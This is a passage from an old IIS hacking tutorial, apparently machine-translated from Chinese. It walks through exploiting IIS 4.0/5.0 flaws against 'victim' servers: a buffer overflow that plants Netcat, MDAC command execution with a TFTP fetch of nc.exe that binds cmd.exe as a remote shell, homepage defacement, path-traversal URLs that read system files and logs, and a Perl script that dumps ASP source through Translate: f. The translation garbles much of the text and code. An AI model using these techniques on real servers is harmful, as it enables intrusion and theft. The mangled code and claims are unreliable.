Some methods about IIS Hack

BY xundi http://www.xfocus.orgxundi1@21cn.com Issued some vulnerabilities about IIS Hack for your reference. 1. Introduction Because these methods operate through port 80, there is a certain threat because it is always available as a web. If you think about smoking, check the vulnerability, OK, you download some CGI scanners to help you check, you can try to use these two: "whisker" by "rain forest puppy" (www.wiretrip.net/rfp). " CIS "by" mnemonix "(www.cerble" (www.cerus-infosec.co.uk), if you want to know the target machine running a type of service, you can use the following command: Telnet 80 Get Head / HTTP / 1.0 You can return some names and web service programs, if some of the servers run the web at 8080, 81, 8000, 8001 port, you will be on the mouth of Telnet. If you want to know the web service run running the SSL, if you connect to the web server and browser, we can use the tool "SSLEAY": s_client -connect : 443 head / http /1.0==== ============================================================================================================================================================================================================= ================= 2, some common methods: ======== Iis Hack ================= WWW.EEYE.COM discovery A buffer overflow of IIS4.0 can allow user to upload programs, such as Netcat to the target server, and bind cmd.exe to 80. This buffer is mainly present in .htr, .idc, and .stm file, this buffer requests for the URL requests for these files do not have a full boundary check for the name, resulting in running an attacker to insert some back door programs to download and execute the program in the system. To detect such a site you need two files Iishack.exe, ncx.exe, you can download the site www.technotronic.com to download, and you still need a Web server, of course, you can be a virtual server. . You now run a web service on your own web server and put ncx.exe in your own corresponding directory, then use Iishack.exe to check the target machine: C: /> Iishack.exe 80 /ncx.exe then you use Netcat to connect to the server you want to detect: C: /> NC 80 If the overflow point correctly you can see the command line prompt of the target machine, and is a power limit.

========= MDAC-Local command execution =========== You may think this vulnerability is too old, can be so large, there may be a lot of IIS web servers exist this vulnerability La. IIS's MDAC component exists that a vulnerability can cause an attacker to remotely execute your system command. The main core problem is to exist in RDS DataFactory. By default, it allows the remote command to send to the IIS server, this command runs as a device user, which is generally the SYSTEM user by default. Regarding this vulnerability, many articles are very clear, not explained in detail here, if you want to check if you have this vulnerability, you can pass the following: c: /> nc -nw -w 2 80 get /msadc/msadcs.dll http If you get the following information: Application / X_varg is very likely that there is no patch and there is this vulnerability, you can use the two programs on the Rain Forest Puppy station to test (WWW .wiretrip.net / RFP) ==> MDAc.pl and MSADC2.PL. C: /> MDAC.PL -H please type the nt commandline you want to run (cmd / c assuMed): / n cmd / cok, if you want to replace the other party's home page, you can use the following method: CMD / C echo Hacked by me> D: /inetpub/wwwroot/victimweb/index.htm or other commands, of course, the best way I think I still use Up to load our Netcat and bind cmd.exe to port 80, We can set our own TFTP service and put the nc.exe, then execute commands, such as: CMD / C CD% SystemRoot% && TFTP -I get nc.exe && del ftptmp && attrib -R nc.exe && nc.exe -l -p 80 -t -e cmd.exe then you will connect to 80, get a shell entry to let you browse. Ha ha! ========= Codebrws.asp & showcode.asp ================== Codebrws.asp and showcode.asp are included in IIS4.0 The program of the file, but not the default installation, this viewer is installed if the administrator allows the sample file to be installed as a contact, however, this viewer does not have a good restriction of the file accessed, the remote attacker can take this vulnerability To check the contents of any file on the target machine, but pay attention to the following: 1. Codebrws.asp and showcode.asp are not installed by default. 2. The vulnerability only allows you to view the file content. 3, this vulnerability cannot bypass the limit of the ACL control list of Windows NT.

4, only the files under the same partition can be viewed (so install the IIS directory and Winnt partition is a good note, or better prevent the latest IIS5.0's Unicode vulnerability) .5, an attacker needs to know the request. name. For example, you find this file and meet the above requirements, you can request the following command: http://www.victim.com/iisample/exair/howitworks/codebrws.asp? Source = / iisamples / exair / howitWorks / Codebrws. ASP You can check the source code of Codebrws.asp. You can also use showcode.asp to view files: http://www.victim.com/msadc/samples/selector/showcode.asp? Source = / msadc /../../../ .. /winnt/win.ini Of course I want to view some FTP information to get other machines that are frequently used by other target administrators, maybe the security of his other machines is poor than Web;), such as: http: // xxx .XXX.XXX.XXX / MSADC / SAMPLES / SELECTOR / Showcode.asp? Source = / msadc / Samples / Winnt / System32 / Logfiles / MSFTPSVC1 / EX00517.LOG ========= Null.htw =============== IIS If INDEX Server is running, it contains a vulnerability related to null.htw, which is not on the server. There is this. Htw ended file. This vulnerability will result in the source code of the ASP script, including sensitive information such as user name and password in Global.asa. Tools If you provide a special URL request to IIS, you can jump out of the virtual directory, provide access to the logical partition and root directory. This "hit-highlighting" function does not fully prevent the request of various types of files in Index Server, so that the attacker will access any file on the server. NULL.HTW function You can get 3 variables from user input: CiWebhitsFile Cirestriction CiHilittype You can transfer variables with the following method to get the source code such as default.asp: http://www.victim.com/null.htw? CiWebhitsFile = / Default.asp% 20 &% 20CIRESTRICTION = None% 20 &% 20 & CiHilittype = FULL does not need a legal .htw file because the virtual file has been stored in memory. ======== WebHits.dll & .htw ================ This hit-highligting feature is provided by INDEX Server to allow a web user on the document HIGHLIGHTED ( Highlight the entry of their original search, the name of this document passes the .htw file through the variable ciWebhitsFile, webhits.dll is an ISAPI application to handle the request, open the file and return the result, when the user controls the CiWebhitsFile parameter to pass to .htw They can request any files, resulting in viewing the ASP source and other script file content.

To know if you have this vulnerability, you can request the following entry: http://www.victw If you get the following information from the server: Format of the query_string is invalid This means you have this vulnerability. This problem is mainly webhits.dll's map of the .htw file, so you can avoid this vulnerability as long as you cancel this mapping, you can search for .htw files in the system you think there is a vulnerability, usually find the following procedures: / iissamples / issamples / oop / qfullhit.htw / iissamples / issamples / oop / qsumrhit.htw / isssamples / exair / search / qfullhit.htw / isssamples / exair / search / qsumrhit.htw / isshelp / iss / misc / iirturnh.htw ( This general purpose to use it) An attacker can use the following methods to access the contents of the file in the system: http://www.victim.com/iissample/issample/oop/qfullhit.htw? CiWebhitsFile = / .. / .. /winnt/win.ini&cirestriction=none&cihilittype=full will be in this vulnerability system. === ASP Alternate Data streams (:: $ data) ================== $ data This vulnerability is published in the mid-1998, $ data is in the NTFS file system The Main Data Stream property stored in the file, by establishing a special format URL, you might use IIS to access this Data Stream (data stream) in your browser, which also shows these Data Street in the file code (data Streaming) and the data code contained in any file. This vulnerability requires the following limitations, one is to display the file to be saved in the NTFS file partition (fortunately for "security" a multi-server set NTFS format), the second is that the file needs to be set to globally readable. And unauthorized users need to know the name of the file name, IIS 1.0, 2.0, 3.0, and 4.0 in WIN NT exist this problem. Microsoft provides a version of For IIS3.0 and 4.0, you can patch this vulnerability through this article: "Supporting NTFS Alternate Data Streams By Asking WindowsNt To Make The File Name Canon" To view some .asp file content, you You can get the source code in the URL: http://www.victim.com/default.asp :: $ data.

You have to understand the data flow problem in the NTFS file system, you may take this article: http://focus.silversand.net/newsite/skill/NTFS.TXT =========Aasp Dot bug ==================== This vulnerability is a relatively early vulnerability, which is the defect discovered in 1997 in 1997. This vulnerability is also leaking the ASP source code to an attacker. This vulnerability is typically existed on IIS3.0, adding one or more points at the end of the requested URL, resulting in leaking the ASP source code. http://www.victim.com/sample.asp.=======m.dll buffer truncated vulnerability =============== This vulnerability is by Cerberus Information Security Team. The earliest discovered, it runs on IIS 4.0 and 5.0, allowing attackers to view any file content and source code. By adding nearly 230 or?% 20? (These represent spaces) after the file name and add? Htr® special request to IIS, will IIS think that the client request is? .Htr? File, and .htr? The suffix of the file is mapped to the ISM.dllisapi application so that IIS transfers this .htr request to this DLL file, then ISM.DLL program opens and execute the passed file, but before the ISM.DLL truncation information, the buffer Send a truncated .htr and there will be some time to return some file content you want to open. Unless the web service stops and restarts, this attack can only be effectively executed. If a .htr request has been sent to the machine, then this attack will fail. It can only work when ISM.DLL first loads the memory. CNNS discovers the additional number to no attack, you can do multiple times attack. http://www.victim.com/global.asa (...<=230 )global.asa.htr================================================================================== =================== This vulnerability actually similar ASP DOT vulnerability, which can display its web directory information on IIS4.0, very strange to say some still in IIS5. 0 This kind of vulnerability is found, by increasing? IDC? Or? IDA? Suffix to the URL will cause the IIS attempt to run. IIS attempt to run .idc, if this .IDC does not exist, it returns some information to customers end.

http://www.victim.com/aNything.idc or anything.idq =================================== ========== This vulnerability is similar to the NSFOCUS, and the URL request to append .htr for some ASA and ASP will lead to the disclosure of the file source code: http://www.victim.com/global .asa .htr =========== Nt Site Server adsamples vulnerability ====== By requesting Site.csc, it is generally saved in /adsamples/config/site.csc, and attackers may get some For example, some information in the database, such as http://www.victim.com/adsamples/config/site.csc========== Some violent cracks. Htr.htr Program =========== IIS4.0 contains an interesting feature that allows the remote user to attack the user account on the web server, that is, your web server converts the address through NAT, and can also be attacked . Each IIS4.0 is installed to create a virtual directory / iisadmpwd, this directory contains multiple .htr files, anonymous users allow access to these files, these files just have not specified only in loopback addr (127.0.0.1), requested these files Jump out of the dialog, let you modify the user's account and password through the web. This directory physical map under the directory below: c: /winnt/system32/inetsrv/iisadmpwdachg.htraexp.htraexp2.htraexp2b.htraexp3.htraexp4.htraexp4b.htRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRANOT3.HTR This, attackers can guess your password . If you don't use this service, you will delete this directory first. ============= tSlate: f bug ==================== Daniel docekal in 2000, on August 15th released this vulnerability (Www.securityfocus.com/bid/1578) The problem is to exist in WebDAV in Office 2000 and FrontPage 2000Server Extensions. When someone requests other scripts of ASP / ASA, in HTTP GET plus Translate: F suffix And on the request file and the file code will be displayed, of course, without playing Win2K SP1 patch.

This is a W2K vulnerability, but since the FP2000 is also installed on IIS4.0, this vulnerability is also available on IIS4.0, you can use the following script to use this vulnerability: ########### ################## @ o :: socket; #my ($ port, $ sock, $ server); # $ size = 0; ####### ###################### $ server = "$ argv [0]"; $ s = "$ server"; $ port = "80"; $ cm = "$ argv [1]"; & connect; sub connect {if ($ # Argv <1) {howto (); exit;} $ VER = "Get / $ cm% 5C http / 1.0host: $ serverAccept: * / * Translate: F / N / N "; MY ($ Iaddr, $ Paddr, $ Proto); $ Iaddr = INET_AON ($ Server) || DIE" Error: $! "; $ Paddr = SockAddr_in ($ Port, $ Iaddr) || Die "Error: $!"; $ proto = getprotobyname ('TCP') || DIE "Error: $!"; Socket (Sock, PF_INET, SOCK_STREAM, $ proto) || DIE "error: $ ! ";" Connect (SOCK, $ PADDR) || Die "Error: $!"; Send (SOCK, $ VER, 0) || Die "can't to send packet: $!"; Open (out, "> $ server.txt "); Print" DUMPING $ cm to $ server.txt / n "; while () {print out ;} Sub HOWTO {Print" Type As Follows: Trans.pl www.victim .com coretoview.asp / n / n ";} close out; $ n = 0; $ type = 2; close (sock); exit (1);} You can use the following method to get the source code: TRASN.PL Www.victim.com default.asp ============= ii The unicode parsing error vulnerability ============================= NSFOCUS security group found that there is a security vulnerability in the implementation of Microsoft IIS 4.0 and IIS 5.0 in Unicode character decoding, resulting in Users can remotely perform any commands through IIS. When IIS opens a file, if the file name contains Unicode characters, it will decode it if the user provides some special coding, which will cause an IIS error to open or perform files other than some web root directory. This article is taken from http://www.nsfocus.com/sa-06.htm, you can see more detailed descriptions. You can use this vulnerability with the following method: (1) If the system contains an executable directory, any system command may be performed.